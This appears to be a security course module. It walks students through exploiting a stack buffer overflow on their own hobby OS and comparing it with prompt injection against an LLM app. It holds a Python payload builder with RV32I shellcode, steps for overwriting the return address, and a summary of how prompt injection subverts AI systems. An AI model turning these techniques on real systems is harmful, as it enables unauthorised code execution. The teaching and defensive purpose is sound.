Duration: 2 hr lecture + 4 hr lab + 5 hr independent
Lab: Lab 2.1 (Stack-smash on Virtus OS v1; annotate at ATLAS level)
Points: 20
MITRE ATLAS coverage: ML Attack Staging (tactic AML.TA0001; e.g., technique AML.T0043 Craft Adversarial Data) as context; ATT&CK T1055 (Process Injection) as substrate-side analogue
Christian weave: The Alignment Problem, Prophecy Ch 2 (the COMPAS proxy problem) -- the structural claim that systems exploit proxies extends to runtime security invariants
Prerequisite: CSA-201 Module 7 (privilege levels, W^X, stack canaries on Virtus OS)
2.1 Why This Module Exists
AI-301 is a Belt-5 course. Every student arrives having reproduced production CVEs in LLM agentic systems. The question is whether those students have the substrate intuition to see the structural class behind the CVE.
Module 2 is not a remedial substrate module. It is a precision calibration. You will reproduce a stack-smash against your own Virtus OS v1 running on your Tang Nano (or Primer 25K). You will then annotate the attack at the structural level: what invariant was violated, what the exploit chain is, and what the language-level parallel is. The deliverable is not "I smashed the stack." It is "I can describe a stack-smash at the level of precision needed to write a coordinated-disclosure report for a language-layer exploit with the same structural class."
2.2 The Virtus OS v1 Exploitation Surface
Your Virtus OS v1, built in the CSA-101 capstone, is a functioning operating system running on an RV32I-Lite CPU. Its exploitation surface depends on which CSA-201 mitigations you applied. For Module 2, you need a version with:
- Stack canaries disabled (so the buffer overflow proceeds to overwrite the return address)
- W^X disabled (so injected shellcode can execute)
- Known stack layout (the CSA-201 debugging output that shows frame offsets)
If your CSA-201 implementation has all mitigations enabled, revert to the pre-mitigation branch or use the instructor-provided pre-mitigation binary image. The lab requires a vulnerable target -- the point is to perform the exploit, not to be stopped by defenses.
The exploitation surface in Virtus OS: The OS includes a simple command-line input handler that reads user input into a fixed-size buffer. This is the canonical stack-overflow target.
; Virtus OS input handler (from CSA-101 Ch 12; simplified representation)
; Stack frame at time of buffer read:
;
; [high addresses]
; [caller's frame]
; [saved ra (return address)] <- target for overwrite
; [saved fp (frame pointer)]
; [local variables (16 bytes)]
; [input_buffer[32]] <- 32-byte buffer (the read is not bounds-checked)
; [low addresses] <- stack grows down
;
; Total overwrite distance: 32 (buffer) + 16 (locals) + 4 (fp) = 52 bytes to reach saved ra
The exact layout depends on your CSA-101 implementation. Use the CSA-201 debugging toolchain (virtus-debug) to dump the stack frame layout for your specific build.
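The offset arithmetic in the diagram can be checked mechanically. The following is a minimal sketch, assuming the illustrative layout above (32-byte buffer, 16 bytes of locals, 4-byte saved fp, 4-byte saved ra). `BUFFER_BASE` is a hypothetical placeholder address and `frame_map` is a name introduced here for illustration; neither comes from virtus-debug.

```python
# Minimal sketch: turn a frame layout (lowest address first) into per-region
# offsets and absolute addresses. Sizes mirror the illustrative diagram;
# BUFFER_BASE is a made-up placeholder, not a value from a real build.
FRAME_LAYOUT = [
    ("input_buffer", 32),
    ("locals", 16),
    ("saved_fp", 4),
    ("saved_ra", 4),
]
BUFFER_BASE = 0x80000FC8  # hypothetical; read the real value from your stack dump


def frame_map(layout, base):
    """Return {region: (offset_from_buffer_start, absolute_address)}."""
    regions = {}
    offset = 0
    for name, size in layout:
        regions[name] = (offset, base + offset)
        offset += size
    return regions


regions = frame_map(FRAME_LAYOUT, BUFFER_BASE)
for name, (offset, addr) in regions.items():
    print(f"{name:<13} offset {offset:>2}  address 0x{addr:08X}")
```

If your build's frame differs, editing `FRAME_LAYOUT` to match the dump should be enough to recompute the distance to the saved return address.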
2.3 The Classic Stack-Smash: What Happens
A stack-smash exploits the failure to enforce the invariant "only the runtime may modify the saved return address." The sequence:
- Overflow the buffer: Write more bytes than the buffer can hold. The overflow extends beyond the buffer's bounds into adjacent stack memory.
- Overwrite local variables: The overflow passes through any local variables allocated above the buffer (at higher addresses; the stack grows down, but the write proceeds upward from the start of the buffer).
- Overwrite the saved frame pointer: The overflow reaches and overwrites the saved frame pointer.
- Overwrite the saved return address: The overflow reaches and overwrites the saved return address with the attacker's chosen value.
- Function return executes the overwrite: When the vulnerable function returns, its epilogue loads the attacker's value from the stack into ra, and the closing ret (jalr zero, 0(ra)) copies it into the program counter. Execution jumps to the attacker's chosen address.
- Shellcode executes: If W^X is disabled, the attacker's chosen address points to shellcode that the overflow payload placed on the stack (in the 2.4 payload, just past the saved return address). The shellcode executes with the privileges of the vulnerable program.
On Virtus OS, "shellcode" means RV32I machine-code instructions that the attacker injects into the overflow payload.
The invariant violation: The saved return address is security-critical state. The runtime assumes that only the function prologue writes it and only the function epilogue reads it. The buffer overflow violates this assumption by writing through the buffer bounds.
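The sequence can be modeled without hardware. The sketch below is a toy model, not Virtus OS code: it represents the illustrative frame from 2.2 as a `bytearray`, copies input into it with no bounds check, and reads back the saved return address. All addresses and the helper names (`make_frame`, `unchecked_read`, `read_saved_ra`) are assumptions made for illustration.

```python
import struct

# Toy frame: index 0 is the lowest address (start of input_buffer).
BUF, LOCALS, FP, RA = 32, 16, 4, 4
RA_OFFSET = BUF + LOCALS + FP  # 52 bytes from buffer start to saved ra


def make_frame(fp_value, ra_value):
    """Build a zeroed frame with the saved fp and saved ra filled in."""
    frame = bytearray(BUF + LOCALS + FP + RA)
    struct.pack_into("<II", frame, BUF + LOCALS, fp_value, ra_value)
    return frame


def unchecked_read(frame, data):
    """Copy input to the buffer start without checking BUF (the bug)."""
    n = min(len(data), len(frame))  # clamp only so the toy model stays in range
    frame[:n] = data[:n]


def read_saved_ra(frame):
    return struct.unpack_from("<I", frame, RA_OFFSET)[0]


frame = make_frame(fp_value=0x80000FF0, ra_value=0x80000123)  # hypothetical values
unchecked_read(frame, b"hello")              # fits in the buffer: ra untouched
ra_after_benign = read_saved_ra(frame)

attack = b"A" * RA_OFFSET + struct.pack("<I", 0x80001000)
unchecked_read(frame, attack)                # 56 bytes: saved ra replaced
ra_after_attack = read_saved_ra(frame)

print(f"benign input: ra = 0x{ra_after_benign:08X}")
print(f"overflow    : ra = 0x{ra_after_attack:08X}")
```

Every write in the model is an ordinary byte copy; nothing distinguishes the copy that stays inside the buffer from the one that replaces the saved return address.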
2.4 Crafting the Exploit Payload
The payload has three parts:
[padding] [fake_return_address] [shellcode]
Padding: Fill the buffer and overwrite locals + saved frame pointer with known values (e.g., 0x41414141 -- "AAAA" in ASCII, visible in memory dumps).
# Payload construction (Python, for generating the binary payload)
import struct
BUFFER_SIZE = 32 # bytes
LOCALS_SIZE = 16 # bytes
SAVED_FP_SIZE = 4 # bytes
PADDING_SIZE = BUFFER_SIZE + LOCALS_SIZE + SAVED_FP_SIZE # = 52 bytes
# RV32I is little-endian, so the address is packed with '<I' below.
# The shellcode follows the fake return address in the payload, so it lands at
# (address of input_buffer) + PADDING_SIZE + 4.
SHELLCODE_ADDR = 0x80001000 # placeholder: compute yours from the virtus-debug stack dump
padding = b'A' * PADDING_SIZE
fake_ra = struct.pack('<I', SHELLCODE_ADDR)
# RV32I shellcode: ECALL to trigger a privileged operation
# (in Virtus OS, ECALL with a0=0xFF causes a debug halt visible in logs)
# This is the "payload" -- not harmful, but demonstrates code execution
shellcode = bytes([
    0x13, 0x05, 0xF0, 0x0F,  # addi a0, zero, 0xFF -- syscall number
    0x73, 0x00, 0x00, 0x00,  # ecall
    0x73, 0x00, 0x10, 0x00,  # ebreak (halt; visible in simulator)
])
payload = padding + fake_ra + shellcode
print(f"Payload: {len(payload)} bytes")
print(f"Hex: {payload.hex()}")
Lab 2.1 Part A: Determine the correct SHELLCODE_ADDR for your Virtus OS build using virtus-debug. Craft the payload with the correct address and confirm that the ebreak instruction fires.
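To see where the shellcode bytes come from, it can help to derive them from the RV32I I-type instruction format (imm[11:0], rs1, funct3, rd, opcode) rather than copy them. The encoder below is a minimal sketch; `encode_i_type` is a helper name introduced here, and it covers only the three instructions used in this module.

```python
import struct


def encode_i_type(opcode, rd, funct3, rs1, imm):
    """Encode an RV32I I-type instruction as 4 little-endian bytes."""
    if not -2048 <= imm <= 2047:
        raise ValueError("I-type immediate must fit in 12 signed bits")
    word = ((imm & 0xFFF) << 20) | (rs1 << 15) | (funct3 << 12) | (rd << 7) | opcode
    return struct.pack("<I", word)


OP_IMM, SYSTEM = 0x13, 0x73   # major opcodes for addi and ecall/ebreak
ZERO, A0 = 0, 10              # register numbers x0 and x10

addi_a0_ff = encode_i_type(OP_IMM, rd=A0, funct3=0, rs1=ZERO, imm=0xFF)
ecall = encode_i_type(SYSTEM, rd=0, funct3=0, rs1=0, imm=0)   # funct12 = 0
ebreak = encode_i_type(SYSTEM, rd=0, funct3=0, rs1=0, imm=1)  # funct12 = 1

shellcode = addi_a0_ff + ecall + ebreak
print(shellcode.hex(" ", 4))
```

Comparing the printed words with the hand-written byte list in the payload script is a quick check that the bytes were not mistyped or byte-swapped.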
2.5 W^X and What Happens When It Is Enabled
When W^X is enabled, the shellcode in the payload cannot execute -- the CPU faults on the attempt to fetch instructions from a page marked non-executable. The exploit as described in 2.3 still corrupts the return address but fails at its final step, shellcode execution.
This is the motivation for ROP (Module 5): instead of injecting shellcode, the attacker chains together gadgets -- short sequences of existing executable instructions ending in a ret -- to build arbitrary computation from code already present in the executable image.
For now, observe the failure. Run the same payload against your Virtus OS with W^X enabled (re-enable it in the kernel configuration). Confirm:
- The overflow still reaches and overwrites the return address (the corruption still happens)
- The jump to the shellcode landing address causes a fault (the execution is stopped)
- The fault appears in the Virtus OS exception handler as a fetch-fault on a non-executable page
Lab 2.1 Part B: Document the W^X fault. Record: the faulting address, the exception code, and the comparison with the pre-W^X run. This is the "W^X mitigation is working" evidence.
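The two runs compared in Part B can be sketched as a permission check at instruction fetch. This is a toy model under stated assumptions: the region boundaries and addresses are hypothetical, `FetchFault` and `try_jump` are names invented here, and the real enforcement mechanism in your Virtus OS build is not modeled.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Region:
    name: str
    start: int
    end: int  # exclusive
    writable: bool
    executable: bool


class FetchFault(Exception):
    """Raised when the toy CPU fetches from a non-executable address."""


def make_memory_map(wx_enabled):
    # Hypothetical addresses, not the real Virtus OS memory map.
    return [
        Region("text", 0x80000000, 0x80000800, writable=False, executable=True),
        # With W^X on, the writable stack is never executable.
        Region("stack", 0x80000800, 0x80002000, writable=True,
               executable=not wx_enabled),
    ]


def fetch(memory_map, pc):
    for region in memory_map:
        if region.start <= pc < region.end:
            if not region.executable:
                raise FetchFault(f"non-executable region '{region.name}' at 0x{pc:08X}")
            return region.name
    raise FetchFault(f"unmapped address 0x{pc:08X}")


def try_jump(wx_enabled, target):
    try:
        return f"executing in {fetch(make_memory_map(wx_enabled), target)}"
    except FetchFault as fault:
        return f"fault: {fault}"


SHELLCODE_ADDR = 0x80001000  # placeholder landing address on the stack
print("W^X off:", try_jump(False, SHELLCODE_ADDR))
print("W^X on :", try_jump(True, SHELLCODE_ADDR))
```

The overwrite is identical in both runs; only the outcome of the fetch differs, which is the comparison Part B asks you to record.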
2.6 ATLAS Annotation of the Attack
A stack-smash on Virtus OS is not natively an ML attack. But ATLAS includes several case studies that involve compromising the substrate layer that an ML system runs on. More importantly, the ATLAS annotation discipline is the same as for a language-layer attack -- and practicing it on a substrate attack sharpens the annotation skill.
Map the stack-smash to ATT&CK + ATLAS:
| Stage | Classical ATT&CK technique | ATLAS equivalent (if any) | What happened |
|---|---|---|---|
| Discovery | T1082 System Information Discovery | No direct analogue (closest: AML.T0007 Discover ML Artifacts) | Dump stack layout with virtus-debug |
| Initial Access | T1190 Exploit Public-Facing Application | AML.T0049 Exploit Public-Facing Application (if remote) | Overflow via input handler |
| Execution | T1055 Process Injection | AML.T0040 ML Model Inference API Access (language parallel) | Shellcode via RET overwrite |
| Defense Evasion | T1562.001 Impair Defenses: Disable or Modify Tools | AML.T0015 Evade ML Model (language parallel) | W^X disabled on target |
Lab 2.1 Part C: Complete the annotation table for your specific exploit chain. Add any stages present in your reproduction that are absent from this template. Note which ATT&CK techniques have ATLAS analogues and which do not.
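One way to keep the Part C annotations consistent is to hold them as records and query them. The sketch below is only a suggestion: the `Annotation` type and `without_atlas_analogue` helper are hypothetical, the stages and ATT&CK IDs are copied from the template, and the ATLAS field is deliberately left empty for you to fill in after checking the ATLAS matrix yourself.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Annotation:
    stage: str
    attack_id: str                   # classical ATT&CK technique ID
    observed: str                    # what happened in your reproduction
    atlas_id: Optional[str] = None   # None = not yet mapped, or no analogue


# Rows copied from the template; ATLAS IDs intentionally left unset.
chain = [
    Annotation("Discovery", "T1082", "Dump stack layout with virtus-debug"),
    Annotation("Initial Access", "T1190", "Overflow via input handler"),
    Annotation("Execution", "T1055", "Shellcode via RET overwrite"),
    Annotation("Defense Evasion", "T1562.001", "W^X disabled on target"),
]


def without_atlas_analogue(annotations):
    """Return the stages whose ATLAS mapping is still empty."""
    return [a.stage for a in annotations if a.atlas_id is None]


print("Stages lacking an ATLAS mapping:", without_atlas_analogue(chain))
```

Appending further `Annotation` rows covers any stages in your reproduction that the template omits.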
2.7 The Language-Layer Parallel: Side by Side
After completing Lab 2.1, pause and write the following comparison. This is the Module 2 essay question (200 words, submitted with the lab report):
Side-by-side comparison: stack-smash on Virtus OS vs prompt injection on DVLA (from AI-201 Lab 2).
The comparison should cover:
- What invariant was violated? (stack: only runtime modifies return address; DVLA: only system prompt defines instructions)
- What was the overflow vehicle? (stack: buffer overflow past bounds; DVLA: user input past trust boundary)
- What was the payload? (stack: shellcode or ROP chain; DVLA: injected instruction in user data)
- What was the execution trigger? (stack: function return; DVLA: model token generation)
- What mitigation exists? (stack: W^X + canaries; DVLA: prompt isolation + output filtering)
Writing this comparison is the point of Module 2. The lab proves you can perform both attacks. The essay proves you understand the structural relationship between them.
2.8 Christian: The Proxy Problem at Runtime
Christian's Prophecy chapter 2 uses COMPAS (the criminal risk assessment algorithm) as the worked example of the proxy problem: the system optimized a score that was a proxy for "recidivism risk," and the proxy diverged from the actual goal in ways that correlated with race. The structural point: any time a system enforces "the rules as stated" rather than "the intent behind the rules," the rules-as-stated become a proxy, and the proxy is exploitable.
The runtime security invariant "only the runtime modifies the return address" is a rules-as-stated enforcement. The hardware memory bus does not know or enforce intent -- it simply moves bytes. An overflow that writes past the buffer bounds is, technically speaking, a sequence of valid memory writes. The intent ("only the runtime writes here") is violated; the rule ("bytes can be written to memory") is not.
This is the same structural phenomenon at the substrate level as prompt injection at the language level: the rule ("process user input as text") is followed; the intent ("treat user input as untrusted data, never as instruction") is violated.
Christian's point about COMPAS is that the designer's mistake was thinking the proxy was the goal. The security analyst's point about buffer overflows is the same: thinking "valid memory write" means "correct behavior" is the proxy mistake. Belt-5 security work requires holding both the rule and the intent simultaneously -- and recognizing when an attacker has found a path that satisfies the rule while violating the intent.